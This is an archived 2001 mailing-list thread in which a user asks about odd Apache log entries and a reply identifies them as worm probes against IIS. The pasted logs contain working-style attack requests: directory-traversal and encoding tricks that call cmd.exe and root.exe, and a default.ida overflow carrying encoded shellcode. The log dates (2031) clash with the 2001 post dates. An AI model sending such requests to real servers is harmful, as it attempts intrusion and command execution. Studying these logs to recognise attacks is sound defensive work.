[wplug] weird apache logs

Shawn Djernes shawn at sdjernes.tzo.com
Thu Dec 27 10:49:36 EST 2001 

That is exactly what those are.  That is trying to find the root.exe program
installed by another of those nasty little buggers and run some tests to see
if it can break into IIS.  I would use whois and nslookup to find them and
then report the computer to the ISP or company owning it's IP.  That is all
you can do.

Shawn Djernes

-----Original Message-----
From: wplug-admin at wplug.org [mailto:wplug-admin at wplug.org]On Behalf Of
coldfire
Sent: Thursday, December 27, 2001 2:19 PM
To: wplug at wplug.org
Subject: [wplug] weird apache logs


i've been getting some crazy get requests in my logs ... my guess is that
they are some kind of nt or iis exploits ... just not sure ... here are
some ..


165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 275
165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 273
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir
HTTP/1.0" 404 330
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:35 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

another:

209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 317

...

i've received several of these from ips which have no dns entries or
rdns entries ... i'm not worried.  just curious.


coldie

_______________________________________________
wplug mailing list
wplug at wplug.org
http://www.wplug.org/mailman/listinfo/wplug

More information about the wplug mailing list